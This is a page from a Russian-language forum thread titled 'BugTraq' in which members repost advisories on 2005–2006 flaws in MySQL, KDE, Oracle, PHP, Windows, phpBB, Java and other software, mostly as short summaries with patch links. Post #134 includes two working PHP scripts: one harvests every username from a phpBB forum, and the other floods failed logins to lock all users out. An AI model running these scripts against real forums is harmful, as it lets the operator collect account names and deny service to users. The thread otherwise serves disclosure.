+ Ответить в теме
Страница 7 из 10 ПерваяПервая ... 3 4 5 6 7 8 9 10 ПоследняяПоследняя
Показано с 121 по 140 из 184

Тема: BugTraq

  1. #121
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,753
    Поблагодарил(а)
    419
    Получено благодарностей: 1,257 (сообщений: 528).

    По умолчанию

    Утечка информации через information_schema в MySQL (information leak)

    Тип:локальная

    Описание:
    Через SELECT * FROM information_schema.views пользователь может узнать запрос выполняемые при обращении к VIEW.

    Затронутые продукты:MYSQL:MySQL 5.0
    Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.

  2. #122
    Banned Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    743
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию Переполнение буфера в KDE при обработке URI в UTF-8 кодировке

    Опасность: Высокая

    Наличие эксплоита: Нет

    Описание:
    Уязвимость позволяет удаленному пользователю вызвать отказ в обслуживании или выполнить произвольный код на целевой системе.

    Уязвимость существует из-за ошибки в kjs при декодировании URI в UTF-8 кодировке. Удаленный пользователь может вызвать переполнение динамической памяти с помощью специально сформированного URI, посредством браузера (Konqueror)и JavaScript кода, и выполнить произвольный код на целевой системе.

    Решение: Установите исправление с сайта производителя.
    KDE 3.4.0 - 3.5.0:
    ftp://ftp.kde.org/pub/kde/security_p...elibs-kjs.diff
    ecc0ec13ce3b06e94e35aa8e937e02bf

    KDE 3.2.0 - 3.3.2:
    ftp://ftp.kde.org/pub/kde/security_p...elibs-kjs.diff
    9bca9b44ca2d84e3b2f85ffb5d30e047

  3. #123
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,753
    Поблагодарил(а)
    419
    Получено благодарностей: 1,257 (сообщений: 528).

    По умолчанию

    Слабое шифрование в модуле perl Net::SSLeay (weak encryption)

    Тип: локальная

    Описание:
    Если не задана переменная окружения EGD_PATH то для сбора энтропии используется файл /tmp/entropy. Атакующий может заполнить файл известными ему значениями.

    Затронутые продукты: PERL:Net::SSLeay 1.25

    Оригинальный текст
    [Full-disclosure] [ MDKSA-2006:023 ] - Updated perl-Net_SSLeay packages fix vulnerability
    Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.

  4. #124
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,753
    Поблагодарил(а)
    419
    Получено благодарностей: 1,257 (сообщений: 528).

    По умолчанию

    Утечка информации через память приложений MS-DOS в Microsoft Windows (information leak)

    Тип: локальная

    Описание:
    Память не инициализируется при создании виртуального пространства для виртуальной DOS-машины, что позволяет прочитать содержимое памяти.

    Затронутые продукты:
    Windows 2000 Server
    Windows 2000 Professional
    Windows XP
    Windows 2003 Server

    Оригинальный текст
    Windows mem leakage
    Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.

  5. #125
    Banned Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    743
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию Обход ограничений безопасности в продуктах Oracle

    Программа:
    Oracle9i Database Standard Edition
    Oracle9i Database Enterprise Edition
    Oracle9i Application Server
    Oracle Application Server 10g
    Oracle Database 8.x
    Oracle HTTP Server 8.x
    Oracle HTTP Server 9.x

    Опасность: Высокая

    Наличие эксплоита: Нет

    Описание:
    Уязвимость позволяет удаленному пользователю обойти ограничения безопасности.

    Уязвимость существует из-за ошибки в компоненте Gateway в Oracle PL/SQL при проверке подлинности определенных HTTP запросов. Удаленный пользователь может обойти ограничения списка PLSQLExclusion и получить доступ к запрещенным пакетам и процедурам с помощью специально сформированного HTTP запроса. Удачная эксплуатация уязвимости позволит злоумышленнику получить доступ с привилегиями DBA к базе данных посредством Web сервера.

    Решение: Способов устранения уязвимости не существует в настоящее время.

  6. #126
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,753
    Поблагодарил(а)
    419
    Получено благодарностей: 1,257 (сообщений: 528).

    По умолчанию

    Многочисленные ошибки в PHP (multiple bugs)

    Описание:
    Межсайтовый скриптинг в phpinfo(), возможность активизации register_globals со стороны клиента в parse_str(), возможность перезаписи переменной $GLOBALS через поле 'fileupload' запроса HTTP POST, а так же переменную через GLOBALS[variable].

    Затронутые продукты:
    PHP:PHP 5.0
    PHP:PHP 4.4
    Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.

  7. #127
    s4SSn
    Guest

    По умолчанию

    Цитата Сообщение от n0ns3ns3
    Многочисленные ошибки в PHP (multiple bugs)

    Описание:
    Межсайтовый скриптинг в phpinfo(), возможность активизации register_globals со стороны клиента в parse_str(), возможность перезаписи переменной $GLOBALS через поле 'fileupload' запроса HTTP POST, а так же переменную через GLOBALS[variable].

    Затронутые продукты:
    PHP:PHP 5.0
    PHP:PHP 4.4
    Межсайтовый скриптинг в phpinfo() - как то скудно ... нонс, выложи подробнее если найдешь... ЗЫ: в инет не отправлять...

  8. #128
    Banned Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    743
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию Переполнение буфера при обработке PLS файлов в Winamp

    Программа: Nullsoft Winamp 5.12 и более ранние версии

    Опасность: Высокая

    Наличие эксплоита: Да

    Описание:
    Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.

    Переполнение буфера обнаружено при обработке тега “File1” в “.pls” файлах. Удаленный пользователь может с помощью специально сформированного файла выполнить произвольный код на целевой системе.

    Решение: Способов устранения уязвимости не существует в настоящее время.

  9. #129
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,753
    Поблагодарил(а)
    419
    Получено благодарностей: 1,257 (сообщений: 528).

    По умолчанию

    Цитата Сообщение от s4SSn
    Межсайтовый скриптинг в phpinfo() - как то скудно ... нонс, выложи подробнее если найдешь... ЗЫ: в инет не отправлять...
    PHP5 Globals Vulnerability: with ?GLOBALS[foobar] you can set the value of the un-initialized $foobar variable. (29.01.2006)

    [SA17763] PHP "mb_send_mail()" "To:" Header Injection Vulnerability (28.11.2005)

    PHP Version 5.1.0 Update Fixes Several Vulnerabilities (26.11.2005)

    [Full-disclosure] Advisory 20/2005: PHP File-Upload $GLOBALS Overwrite Vulnerability (31.10.2005)

    [Full-disclosure] Advisory 19/2005: PHP register_globals Activation Vulnerability in parse_str() (31.10.2005)

    [Full-disclosure] Advisory 18/2005: PHP Cross Site Scripting (XSS) Vulnerability in phpinfo() (31.10.2005)

    [Full-disclosure] Advisory 18/2005: PHP Cross Site Scripting (XSS) Vulnerability in phpinfo()

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1


    Hardened-PHP Project
    www.hardened-php.net

    -= Security Advisory =-


    Advisory: PHP Cross Site Scripting (XSS) Vulnerability in phpinfo()
    Release Date: 2005/10/31
    Last Modified: 2005/10/31
    Author: Stefan Esser [sesser@hardened-php.net]

    Application: PHP4 <= 4.4.0
    PHP5 <= 5.0.5
    Severity: A Cross Site Scripting (XSS) Vulnerability in phpinfo()
    could f.e. lead to cookie data exposure if an info
    script is left on a production server.
    Risk: Low
    Vendor Status: Vendor has released a bugfixed PHP 4 version
    References: http://www.hardened-php.net/advisory_182005.77.html


    Overview:

    PHP is a widely-used general-purpose scripting language that is
    especially suited for Web development and can be embedded into HTML.

    During the development of the Hardening-Patch which adds security
    hardening features to the PHP codebase, several vulnerabilities
    within PHP were discovered. This advisory describes one of these
    flaws concerning a weakness in the phpinfo() function, which allows
    Cross Site Scripting (XSS).


    Details:

    The phpinfo() function outputs a large amount of information about
    the current state of PHP. This includes information about PHP
    compilation options and extensions, the PHP version, server
    information and environment (if compiled as a module), the PHP
    environment, OS version information, paths, master and local
    values of configuration options and request variables, HTTP
    headers, and the PHP License.

    Because phpinfo() leaks a lot of information to the viewer it is
    not recommended to leave a script executing phpinfo() on a
    production server. However in reality phpinfo() scripts are left
    open on a lot of servers. While this is already bad enough, there
    is also a problem when request variables of a certain form are
    displayed. With a properly crafted URL, that contains a stacked
    array assignment it is f.e. possible to inject HTML code into the
    output of phpinfo(), which could result in the leakage of domain
    cookies (f.e. session identifiers).


    Proof of Concept:

    The Hardened-PHP project is not going to release exploits for any
    of these vulnerabilities to the public.


    Recommendation:

    It is strongly recommended to never leave phpinfo() scripts on
    production servers, additionally it is recommended to upgrade to
    the new PHP-Releases as soon as possible, because it also fixes
    a few vulnerabilities, that are rated critical. Finally we always
    recommend to run PHP with the Hardening-Patch applied.


    GPG-Key:

    http://www.hardened-php.net/hardened...nature-key.asc

    pub 1024D/0A864AA1 2004-04-17 Hardened-PHP Signature Key
    Key fingerprint = 066F A6D0 E57E 9936 9082 7E52 4439 14CC 0A86 4AA1


    Copyright 2005 Stefan Esser. All rights reserved.

    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.0.6 (GNU/Linux)
    Comment: For info see http://www.gnupg.org

    iD8DBQFDZhz7RDkUzAqGSqERAt9xAJ9n80d64fyNFyeWWwEVns HfuyjE8wCeNgx3
    OhyWy37m+0oH/xv6yIcNaCs=
    =X39u
    -----END PGP SIGNATURE-----
    Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.

  10. #130
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,753
    Поблагодарил(а)
    419
    Получено благодарностей: 1,257 (сообщений: 528).

    По умолчанию

    Атака межсайтовых cookie (cross site cooking)

    Описание:
    Существует несколько возможностей установить Cookie для другого сайта.

    Оригинальный текст:
    [Full-disclosure] Cross Site Cooking

    (Why, yes, I came up with the name, and had to find some bugs to be able
    to post this.)

    Summary
    -------

    There are three fairly interesting flaws in how HTTP cookies were
    designed and later implemented in various browsers; these shortcomings
    make it possible (and alarmingly easy) for malicious sites to plant
    spoofed cookies that will be relayed by unsuspecting visitors to
    legitimate, third-party servers.

    Impact
    ------

    Many commercial websites may be attacked to overwrite or delete
    stored preferences, session identifiers, authentication data,
    cart contents - with results ranging from minor annoyances to
    a possibility of fraudulent activity, depending on site design
    (bugs #1 and #2).

    On sites where authentication data is tied on a server to a session ID,
    the attacker may be able to acquire credentials by tricking the
    visitor to authenticate within a session initiated by the attacker
    (bugs #1 and #2)

    Some websites may be susceptible to malicious-activity-by-proxy
    attacks (bug #3).

    There is no immediate universal threat to life as we know it, but
    numerous web scripts are an easy target of specific variants of the
    attacks described below.

    Discussion
    ----------

    Let's begin with a quick primer on cookie parsing: when a new cookie is
    issued to the browser (via "Set-Cookie" header in a HTTP response), the
    server is expected to specify the domain and URI for which the cookie is
    meaningful. This mechanism is present so that pages could limit the
    scope of their cookies if needed, and prevent the data from being sent
    to unrelated addresses in the same domain. For security purposes, the
    browser will (theoretically) reject a cookie that is set for a domain
    that is either defined too broadly, or does not match issuer's location
    at all.

    (In other words, http://www.example.com/ may set a cookie that will be
    sent to http://mail.example.com/, but not to http://forums.example.com/;
    it cannot configure a cookie to be sent to all .com servers, nor to an
    unrelated server, example.co.uk, however.)

    Problem #1 - trouble with these pesky foreigners
    ------------------------------------------------

    The mechanism for preventing overly relaxed cookie domain
    specification seems to be broken in all major browsers. Some ancient
    documents invoke the following flawed but reasonable rule:

    "Two dots are required if the top level domain is: .COM, .EDU, .NET,
    .ORG, .GOV, .MIL, or .INT. Three dots are required for any other
    domain. This is to prevent the subdomain from being set to something
    like .COM, the subdomain of all commercial machines."

    [ http://www.ciac.org/ciac/bulletins/i-034.shtml ]

    This is repeated ad nauseam in various cookie tutorials and FAQs,
    but my initial tests indicate that the rule is quite simply not true.
    Both MSIE and Firefox seem to be perfectly happy with two-period
    ccTLDs domain cookies (.xxx.xx).

    In other words, one can set a cookie for *.com.pl or *.com.fr, and
    override or corrupt credentials or other parameters on hundreds of
    thousands e-commerce websites in that country. It will be also
    possible to plant attacker's session ID on visitor's computer,
    and effectively, steal his credentials when he decides to sign in
    on the target site.

    Problem #2 - these cursed periods
    ---------------------------------

    Another twist on the story is that there is no checking if there's
    anything between periods in domain name - and extra trailing periods
    are accepted by most resolvers as a way to override local domain
    search path.

    One can set a cookie for ".com.", then bounce the visitor to
    http://www.victim.com./ . This address differs from the "real" one,
    and thus, unlike with #1, planted cookies would work only for this
    visit - but the trailing "." is not an alarming pattern for most
    users. In fact, seasoned users recognize it and sometimes purposefully
    append it - and as such, they won't be tempted to be suspicious, and
    may interact with the website (perhaps even authenticate within
    the session ID supplied by and known to the attacker).

    A surprise of sorts... I'm not the first person to spot this:
    http://www.nihongo.org/snowhare/utilities/triple_dot/ - credit
    goes to Benjamin Franz... vendors were notified in 1998, and certainly
    are not in a hurry to fix this.

    Ok, let's go back to cookie handling for a while...

    All the verification of domain path is limited to client-side; when
    the server receives a cookie ("Cookie" header in a HTTP request), there
    is no information about the original issuer. It is assumed that the
    browser behaves rationally, and is sending the cookie to a site or a set
    of sites that previously issued it. The only other option is that the
    user willingly tampered with the request, and is OK with any eventual
    consequences of his actions.

    This is a mistake.

    Problem #3 - it's the address that counts
    -----------------------------------------

    The attacker may easily force random visitors to accept and relay
    arbitrary cookies to a third-party site by a) setting up
    http://example.com; b) issuing all visitors a cookie that mimicks
    victim's cookies, but is valid for *.example.com; c) setting IN A
    record for evil.example.com to the IP address of its victim; d)
    redirecting users to http://evil.example.com. This will cause
    visitor's browser to send attacker's cookie to victim's server exactly
    as if it were a cookie originally issued by the victim himself.

    This trick alone does not compromise, disclose, erase, or supersede
    user's settings should he later access the site through its proper
    address; and since a bogus address is displayed in URL bar, the
    user is not tempted to interact with the website. (There are some
    brain-damaged examples of sessionID-in-URL redirects, but these
    have a fair share of other problems.)

    I do believe there is some risk, however: using this trick, a brand
    new identity may be temporarily bestowed upon the user, and used to
    perform certain undesirable or malicious tasks on the target site
    before he has a chance to object (hiding attacker's identity or
    bypassing IP-based limits). DDoS or session ID brute-forcing uses are
    also tempting.

    That said, this alone is not a major problem for a well-designed
    website and a savvy user; alas, websites should be designed with the
    knowledge of this possibility; and furhter research on specific
    applications of this technique to existing backends might be quite
    valuable.

    Well... that's the story...

    Solution
    --------

    Problem #1: There is no sane solution, other than altering HTTP cookie
    format so that the server gets a chance to figure out who issued that
    cookie in the first place. Workarounds by listing ccTLDs that use
    .xxx.xx/.xx.xx subdomains in the browser are better than nothing
    at all.

    Problem #2: Browsers should strip "idle" periods in cookie
    domain data. Browser vendors should take less than 8 years to address
    security problems.

    Problem #3: The immediate fix to this problem is requiring and carefully
    validating HTTP/1.1 "Host" header on all requests (this ensures that the
    browser's idea of who he's talking to matches the site's canonical
    name).

    Lame plug
    ---------

    http://lcamtuf.coredump.cx/silence/

    Cheers,
    /mz
    Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.

  11. #131
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,753
    Поблагодарил(а)
    419
    Получено благодарностей: 1,257 (сообщений: 528).

    По умолчанию

    Повышение привилегий через системные службы в Microsoft Windows (privilege escalation)

    Описание:
    Несколько системных служб (SSDP, uPnP) позволяют конфигурацию локальным пользователем, включая указание расположение исполняемого файла. Это позволяет получить привилегии локальной системы.

    Затронутые продукты:
    MICROSOFT:Windows XP

    Windows Access Control Demystified

    Hello everybody,

    We have constructed a logical model of Windows XP access control, in a declarative but executable (Datalog)
    format. We have built a scanner that reads access-control configuration information from the Windows
    registry, file system, and service control manager database, and feeds raw configuration data to the model.
    Therefore we can reason about such things as the existence of privilege-escalation attacks, and indeed we
    have found several user-to-administrator vulnerabilities caused by misconfigurations of the access-control
    lists of commercial software from several major vendors. We propose tools such as ours as a vehicle for
    software developers and system administrators to model and debug the complex interactions of access control
    on installations under Windows.


    The full version of the paper can be found at:

    http://www.cs.princeton.edu/~sudhakar/papers/winval.pdf


    All the vendors and CERT are aware of this paper. The bugs are *not*
    remotely exploitable. The CERT id is VU#953860.


    regards,
    Sudhakar Govindavajhala and Andrew Appel.

    Bio:

    Sudhakar Govindavajhala is a finishing PhD student at Computer Science department, Princeton university.
    His interests are computer security, operating systems and networks. Sudhakar is looking for employment
    opportunities.


    Andrew Appel is a Professor of Computer Science at Princeton University. He is currently on sabbatcal at
    INRIA Rocquencourt. His interests are computer security, compilers, programming languages, type theory, and
    functional programming.
    Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.

  12. #132
    Banned Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    743
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию Отказ в обслуживании модуле netinet в FreeBSD

    Программа: FreeBSD 5.3, 5.4

    Опасность: Средняя

    Наличие эксплоита: Нет

    Описание:
    Удаленный пользователь может вызвать отказ в обслуживании системы.

    Уязвимость существует в реализации алгоритма выборочного подтверждения (SACK - Selective Acknowledgement) при обработке TCP пакетов. Удаленный пользователь может послать уязвимой системе специально сформированные TCP пакеты, вызвать зацикливание TCP/IP стека и потребить все доступные ресурсы на системе. Удачная эксплуатация уязвимости позволит злоумышленнику вызвать отказ в обслуживании системы.

    Решение: Установите исправление с сайта производителя.
    ftp://ftp.FreeBSD.org/pub/FreeBSD/CE...:08/sack.patch
    ftp://ftp.FreeBSD.org/pub/FreeBSD/CE...sack.patch.asc

  13. #133
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,753
    Поблагодарил(а)
    419
    Получено благодарностей: 1,257 (сообщений: 528).

    По умолчанию

    Обнаружена уязвимость в Microsoft HTML Help Workshop

    Обнаружена опасная уязвимость в Microsoft HTML Help Workshop v.4.74.8702.0(и предыдущих версиях). В результате ошибки обработки файла ".hpp" с длинным значением строковой переменой поля "Contents file" происходит переполнение буфера, которое может быть использовано злоумышленником с целью выполнения произвольного программного кода.
    Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.

  14. #134
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,753
    Поблагодарил(а)
    419
    Получено благодарностей: 1,257 (сообщений: 528).

    По умолчанию

    Уязвимость в phpbb 2.0.19 (возможно более ранние версии)

    Уязвимость позволяет забанить всех пользователей на форуме, что в свою очередь может вызвать сбой в работе базы данных.
    Суть ошибки состоит в том, что при авторизации пользователя можно вести неверные данные x-раз, что приведет к бану соответствующего пользователя форума на определенное время указное в админке форума и пользователь при авторизации увидит следующее - (Максимальное количество попыток (X) войти на форум было исчерпано. Вы не сможете войти на форум в последующие Y минут.) или произойдет ошибка в базе данных (phpBB : Critical Error Could not connect to the database).

    Собирает в файл Ники всех пользователей форума.

    Код:
    PHP код:
    $host="Сайт";
    $papka="Папка с форумом";
    $port=80;
    $number_users=2050;
    $start=1;
    set_time_limit(0);
    $file="user.txt";
    $file=fopen($file,*w*);
    for(
    $i=$start;$i<=$number_users;$i++)
    {
    $request="GET http://$host/$papka/profile.php?mode=viewprofile&u=$i HTTP/1.0\r\n";
    $request.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, *\/*\r\n";
    $request.="Accept-Language: ru\r\n";
    $request.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
    $request.="Host: $host\r\n";
    $request.="Proxy-Connection: Keep-Alive\r\n\r\n";
    $sock=fsockopen("$host",$port,$errno,$errstr);
    fputs($sock,$request);
    while(!
    feof($sock))
    {
    $str=fgets($sock);
    if(
    preg_match("/nowrap=\"nowrap\">Профиль пользователя (.*)<\/th>/i",$str,$return))
    {if(
    trim($return***91;1***93;)!=**)
    {
    fputs($file,"$return***91;1***93;\n");
    }}}}
    fclose($file);
    fclose($sock);
    ?> 
    Скрипт для сборки всех зарегенных юзеров универсальный т.е. подходит под любой форум. Но только если:
    1. Если не зарегеным пользователям можно смотреть профайл других (иначе придеться еще посылать строку с вашими куками)
    2. Правильно настроен preg_match("/nowrap=\"nowrap\">Профиль пользователя (.*)<\/th>/i",$str,$return))
    в некоторых форумах придеться немного изменить, если допустим имя юзверя находиться в титле
    то переписываем preg_match как
    preg_match("/&lttitle>Юзер - (.*)<\/title>/i",$str,$return))

    Сам сплоит

    Код:
    PHP код:
    set_time_limit(0);
    $host="Сайт";
    $papka="Папка с форумом";
    $file=fopen("user.txt",*r*);
    while(!
    feof($file))
    {
    $str=fgets($file);
    $str=trim($str);
    for(
    $i=0$i<=5$i++)
    {
    $request="POST http://$host/$papka/login.php?sid=f1bed4ab383a8521a612d6896e0ee21e HTTP/1.0\r\n";
    $request.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, *\/*\r\n";
    $request.="Referer: http://$host/$papka/login.php\r\n";
    $request.="Accept-Language: ru\r\n";
    $request.="Content-Type: application/x-www-form-urlencoded\r\n";
    $request.="Proxy-Connection: Keep-Alive\r\n";
    $request.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MyIE2)\r\n";
    $request.="Host: $host\r\n";
    $request.="Content-Length: 73\r\n";
    $request.="Pragma: no-cache\r\n";
    $request.="Cookie: b=b; phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=f1bed4ab383a8521a612d6896e0ee21e; hotlog=1\r\n";
    $request.="\r\n";
    $request.="username=$str&password=5555&redirect=&login=%C2%F5%EE%E4\r\n\r\n";
    $fp=fsockopen("$host",80,$errstr,$errno);
    fputs($fp,$request);
    fclose($fp); 
    }
    }
    ?> 
    Защита
    Убрать ограничение на число входов с неправильным паролем или увеличить его число через админку форума.
    securityinfo.ru
    Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.

  15. #135
    Banned Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    743
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию Подмена заголовков сообщений в The Bat!

    Программа: The Bat! 2.x

    Опасность: Низкая

    Наличие эксплоита: Да

    Описание:

    Уязвимость позволяет удаленному пользователю подменить заголовки в сообщениях.

    Ошибка дизайна существует при отображении полученного сообщения. Удаленный пользователь может с помощью специально сформированного письма подменить оригинальные заголовки сообщения, включая сеть отправителя.

    Решение: Установите последнюю версию (3.5) с сайта производителя.

  16. #136
    Banned Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    743
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию Целочисленное переполнение в MPlayer при обработке ASF файлов

    Программа: MPlayer 1.0pre7try2, возможно более ранние версии.

    Опасность: Высокая

    Наличие эксплоита: Нет

    Описание:
    Уязвимость позволяет удаленному пользователю вызвать отказ в обслуживании или выполнить произвольный код на целевой системе.

    Целочисленное переполнение буфера существует в функциях "new_demux_packet()" файла "libmpdemux/demuxer.h" и "demux_asf_read_packet()" файла "libmpdemux/demux_asf.c" при распределении памяти для копирования данных из ".asf" файла. Удаленный пользователь может с помощью специально сформированного ".asf" файла вызвать переполнение динамической памяти и выполнить произвольный код на целевой системе.

    Решение: Способов устранения уязвимости не существует в настоящее время.

  17. #137
    Banned Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    743
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию Обход ограничений безопасности в phpBB

    Программа: phpBB 2.0.19, возможно более ранние версии

    Опасность: Низкая

    Наличие эксплоита: Да

    Описание:
    Уязвимость позволяет удаленному пользователю произвести брут-форс атаку.

    Уязвимость существует из-за того, что функция "gen_rand_string()" генерирует угадываемые случайные номера. Удаленный пользователь может изменить пароль к целевой учетной записи с помощью функционала восстановления пароля путем отправки большого количества запросов для подбора Validation ID (не более 1000000 запросов). Для удачной эксплуатации уязвимости злоумышленнику необходимо знать e-mail целевой учетной записи.

    Решение: Способов устранения уязвимости не существует в настоящее время.

  18. #138
    Banned Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    743
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию Отказ в обслуживании при обработке ICMP пакетов в ядре Linux

    Программа: Linux kernel версии до 2.6.15.3

    Опасность: Средняя

    Наличие эксплоита: Нет

    Описание:
    Уязвимость позволяет удаленному пользователю вызвать отказ в обслуживании системы.

    Уязвимость существует из-за ошибки при создании ICMP ответа в функции "ip_options_echo()" в файле icmp.c. Удаленный пользователь может с помощью специально сформированного ICMP пакета, содержащего опции record-route или timestamp вызвать отказ в обслуживании системы.

    Решение: Установите последнюю версию (2.6.15.3) с сайта производителя.

  19. #139
    Banned Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    743
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию Обход ограничений безопасности в Sun Java JRE

    Программа:
    JDK and JRE 5.0 Update 5 и более ранние версии
    SDK and JRE 1.4.2_09 и более ранние версии
    SDK and JRE 1.3.1_16 и более ранние версии

    Опасность: Высокая

    Наличие эксплоита: Нет

    Описание:
    Обнаруженные уязвимости позволяют удаленному пользователю скомпрометировать уязвимую систему.

    Уязвимости существуют из-за неизвестных ошибок в "reflection" API. Злонамеренный апплет может обойти ограничения безопасности песочницы, прочитать и записать произвольные файлы, выполнить произвольные приложения на системе.

    Решение: Установите исправленную версию с сайта производителя.
    JDK and JRE 5.0:
    Update to JDK and JRE 5.0 Update 6 or later.
    http://java.sun.com/j2se/1.5.0/download.jsp

    SDK and JRE 1.4.x:
    Update to SDK and JRE 1.4.2_10 or later.
    http://java.sun.com/j2se/1.4.2/download.html

    SDK and JRE 1.3.x:
    Update to SDK and JRE 1.3.1_17 or later.
    http://java.sun.com/j2se/1.3/download.html

  20. #140
    Banned Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    743
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию Раскрытие данных в Openwall crypt_blowfish

    Программа: Openwall crypt_blowfish 0.4.7 и более ранние версии

    Опасность: Низкая

    Наличие эксплоита: Нет

    Описание:
    Уязвимость позволяет удаленному пользователю получить доступ к потенциально важным данным на системе.

    Уязвимость существует из-за ошибки в crypt_gensalt.c. Некоторые DES и MD5 хеши пароли могут быть сгенерированны с использованием одинаковых значений salt. Удачная эксплуатация уязвимости позволит злоумышленнику ускорить процесс подбора пароля.

    URL производителя: www.openwall.com/crypt/

    Решение: Установите последнюю версию (1.0) с сайта производителя.

+ Ответить в теме
Страница 7 из 10 ПерваяПервая ... 3 4 5 6 7 8 9 10 ПоследняяПоследняя

Информация о теме

Пользователи, просматривающие эту тему

Эту тему просматривают: 1 (пользователей: 0 , гостей: 1)

     

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
